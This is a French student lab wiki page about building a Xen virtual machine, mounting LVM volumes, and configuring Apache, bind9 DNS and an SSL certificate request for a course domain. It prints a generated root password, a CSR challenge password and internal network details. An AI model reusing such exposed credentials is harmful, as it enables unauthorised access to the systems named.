! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation,on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS/DNSSEC bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires le gestionnaire de RAID Logiciel: Mdadm ====&lt;br /&gt;
Mdadm est une solution de RAID logiciel très fiable et très répandue dans la communauté Linux. Ce paquetage sera nécessaire pour la création d'un RAID5&lt;br /&gt;
   apt install mdadm&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
